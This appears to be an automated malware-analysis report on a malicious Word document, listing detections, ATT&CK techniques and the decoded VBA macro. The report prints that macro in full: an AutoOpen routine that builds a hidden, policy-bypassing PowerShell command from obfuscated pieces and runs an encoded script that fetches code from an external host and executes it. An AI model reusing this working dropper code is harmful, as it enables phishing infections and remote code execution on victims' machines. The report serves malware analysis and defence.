MALICIOUS
170
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. This macro is designed to execute a shell command, likely to download and run a secondary payload, as indicated by the ClamAV detection name 'Doc.Dropper.Agent-6453829-0'. The presence of legacy WordBasic markers and the critical heuristic for a potential Shell call further support this conclusion.
Heuristics 6
-
ClamAV: Doc.Dropper.Agent-6453829-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6453829-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
FR_MC = FR_MC + AQ_OC Shell$ FR_MC End Sub -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Name = "freeform" Sub AutoOpen() Dim FR_MC As String -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5907 bytes |
SHA-256: 512714d2c1ff1c9e28381d2ff56478b68d116b8f281837c5aeec9e79aa3df2fc |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "freeform"
Sub AutoOpen()
Dim FR_MC As String
GN_QI = Array("-", "c", "u", "n", "b", "y", "p", "w", "x", "i", "a", "o", "d", "e", "h", " ", "r", "t", "s", "l")
Dim EM_NE As String
EM_NE = "ZgB1AG4AYwB0AGkAbwBuACAAYQAoACQAeAApAHsAcgBl"
FR_MC = FR_MC + GN_QI(6)
FR_MC = FR_MC + GN_QI(11)
Dim BQ_SF As String
BQ_SF = "AHQAdQByAG4AIABbAFMAeQBzAH"
FR_MC = FR_MC + GN_QI(7)
FR_MC = FR_MC + GN_QI(13)
Dim FN_RE As String
FN_RE = "QAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBd"
FR_MC = FR_MC + GN_QI(16)
FR_MC = FR_MC + GN_QI(18)
Dim HK_NF As String
HK_NF = "ADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0A"
FR_MC = FR_MC + GN_QI(14)
FR_MC = FR_MC + GN_QI(13)
Dim BS_NC As String
BS_NC = "HIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvA"
AQ_OC = AQ_OC & EM_NE & BQ_SF & FN_RE & HK_NF & BS_NC
FR_MC = FR_MC + GN_QI(19)
FR_MC = FR_MC + GN_QI(19)
Dim EP_TA As String
EP_TA = "G4AdgBlAHIAdA"
FR_MC = FR_MC + GN_QI(15)
FR_MC = FR_MC + GN_QI(0)
Dim CK_RJ As String
CK_RJ = "BdADoAOgBGAHIAbwBtAEIAYQBz"
FR_MC = FR_MC + GN_QI(7)
FR_MC = FR_MC + GN_QI(9)
Dim BK_OC As String
BK_OC = "AGUANgA0AFMAdAByAGkAbg"
FR_MC = FR_MC + GN_QI(3)
FR_MC = FR_MC + GN_QI(12)
Dim EP_TB As String
EP_TB = "BnACgAJAB4ACkAKQB9AD"
FR_MC = FR_MC + GN_QI(11)
FR_MC = FR_MC + GN_QI(7)
Dim EK_QE As String
EK_QE = "sAaQBlAHgAIAAkACgAYQAgACQAKA"
AQ_OC = AQ_OC & EP_TA & CK_RJ & BK_OC & EP_TB & EK_QE
FR_MC = FR_MC + GN_QI(18)
FR_MC = FR_MC + GN_QI(17)
Dim BL_KE As String
BL_KE = "AkACgAJAAoAGkAb"
FR_MC = FR_MC + GN_QI(5)
FR_MC = FR_MC + GN_QI(19)
Dim BR_MH As String
BR_MH = "gB2AG8AawBlAC0AdwBlAGIAcg"
FR_MC = FR_MC + GN_QI(13)
FR_MC = FR_MC + GN_QI(15)
Dim IK_QA As String
IK_QA = "BlAHEAdQBlAHMAdAAg"
FR_MC = FR_MC + GN_QI(14)
FR_MC = FR_MC + GN_QI(9)
Dim GK_RJ As String
GK_RJ = "ACcAaAB0AH"
FR_MC = FR_MC + GN_QI(12)
FR_MC = FR_MC + GN_QI(12)
Dim CS_PJ As String
CS_PJ = "QAcABzADoALwAvAHUAcwBwAHIAZAA1ADEANQAwAG"
AQ_OC = AQ_OC & BL_KE & BR_MH & IK_QA & GK_RJ & CS_PJ
FR_MC = FR_MC + GN_QI(13)
FR_MC = FR_MC + GN_QI(3)
Dim AR_PD As String
AR_PD = "MAZQBuAHQAcgBhAGw"
FR_MC = FR_MC + GN_QI(15)
FR_MC = FR_MC + GN_QI(0)
Dim IQ_OJ As String
IQ_OJ = "ALgB0AGEAYgBsAGUALgBjAG8Acg"
FR_MC = FR_MC + GN_QI(13)
FR_MC = FR_MC + GN_QI(8)
Dim JO_SJ As String
JO_SJ = "BlAC4AdwBpAG4AZABvAHcAcwAuAG4AZQB0AC8AdwBhAHIAZQ"
FR_MC = FR_MC + GN_QI(13)
FR_MC = FR_MC + GN_QI(1)
Dim DN_LF As String
DN_LF = "BoAG8AdQBzAGUAPwAkAGYAaQBsAHQA"
FR_MC = FR_MC + GN_QI(2)
FR_MC = FR_MC + GN_QI(17)
Dim GL_TI As String
GL_TI = "ZQByAD0AUABhAHIAdABp"
AQ_OC = AQ_OC & AR_PD & IQ_OJ & JO_SJ & DN_LF & GL_TI
FR_MC = FR_MC + GN_QI(9)
FR_MC = FR_MC + GN_QI(11)
Dim BP_OD As String
BP_OD = "AHQAaQBvAG4ASwB"
FR_MC = FR_MC + GN_QI(3)
FR_MC = FR_MC + GN_QI(6)
Dim AM_LF As String
AM_LF = "lAHkAJQAyADAAZQBxACUAMgAwACUAMgA3AHMAdABhAGcAZQA"
FR_MC = FR_MC + GN_QI(11)
FR_MC = FR_MC + GN_QI(19)
Dim DN_NG As String
DN_NG = "lADIANwAmACQAUwBlAGw"
FR_MC = FR_MC + GN_QI(9)
FR_MC = FR_MC + GN_QI(1)
Dim DQ_KJ As String
DQ_KJ = "AZQBjAHQAPQBkAGEAdABhACYAcwB2AD0AMgAwADEAN"
FR_MC = FR_MC + GN_QI(5)
FR_MC = FR_MC + GN_QI(15)
Dim DR_PG As String
DR_PG = "wAtADAANAAtADEANwAmAHMAcwA9AGIAZgBxAHQAJgBz"
AQ_OC = AQ_OC & BP_OD & AM_LF & DN_NG & DQ_KJ & DR_PG
FR_MC = FR_MC + GN_QI(4)
FR_MC = FR_MC + GN_QI(5)
Dim BS_PB As String
BS_PB = "AHIAdAA9AHMAYwBvACYAcwBwAD0AcgB3AG"
FR_MC = FR_MC + GN_QI(6)
FR_MC = FR_MC + GN_QI(10)
Dim DR_MF As String
DR_MF = "QAbABhAGMAdQBwACYAcwBlA"
FR_MC = FR_MC + GN_QI(18)
FR_MC = FR_MC + GN_QI(18)
Dim HT_LD As String
HT_LD = "D0AMgAwADEANwAtADEAMAAtADAANgBUADIAMg"
FR_MC = FR_MC + GN_QI(15)
FR_MC = FR_MC + GN_QI(0)
Dim EO_RA As String
EO_RA = "A6ADQAMQA6ADEAMgBaACYAcwB0AD0AMgAwADEANwAt"
FR_MC = FR_MC + GN_QI(13)
FR_MC = FR_MC + GN_QI(15)
Dim CP_RD As String
CP_RD = "ADAAOQAtADIAOABUADEANAA6ADQ"
AQ_OC = AQ_OC & BS_PB & DR_MF & HT_LD & EO_RA & CP_RD
Dim GL_LD As String
GL_LD = "AMQA6ADEAMg"
Dim GP_OB As String
GP_OB = "BaACYAcwBwAHIAPQBoAHQAdABwAHMAJgBzAGkAZwA9AH"
Dim CK_SI As String
CK_SI = "QAegBQADcAYwA4AHgAWgBoAHIAMQBzAGIAdgB4ADkAZgB"
Dim JM_KA As String
JM_KA = "KAFMAdwBKAEkAUwBIAEIANgBlADgAJQAyAEI"
Dim BT_TB As String
BT_TB = "AbgBsAGwAdQBuAEgAaQBmAEwAM"
AQ_OC = AQ_OC & GL_LD & GP_OB & CK_SI & JM_KA & BT_TB
Dim IQ_RI As String
IQ_RI = "wBoAHgAag"
Dim AL_LC As String
AL_LC = "A0ACUAMwBEACcAIAAtAEgA"
Dim FK_QF As String
FK_QF = "ZQBhAGQAZQByAHMAIABAAHsAJwBBAGMAYwBlAHAAdAAnAD0"
Dim AT_OI As String
AT_OI = "AJwBBAHAAcABsAGkAYwBhAHQAaQBvAG4ALwBKAFMATwBOA"
Dim FP_SI As String
FP_SI = "CcAfQApAC4AQwBvAG4AdABlAG4AdAAg"
AQ_OC = AQ_OC & IQ_RI & AL_LC & FK_QF & AT_OI & FP_SI
Dim AQ_RH As String
AQ_RH = "AHwAIABDAG8AbgB2AGUAcgB0AE"
AQ_OC = AQ_OC & AQ_RH
Dim BQ_QF As String
BQ_QF = "YAcgBvAG0ALQBKAHMAbwBuACkALgB2AGEAbAB1"
AQ_OC = AQ_OC & BQ_QF
Dim IL_OC As String
IL_OC = "AGUALgBkAGEAdABhACkAKQA="
AQ_OC = AQ_OC & IL_OC
FR_MC = FR_MC + AQ_OC
Shell$ FR_MC
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.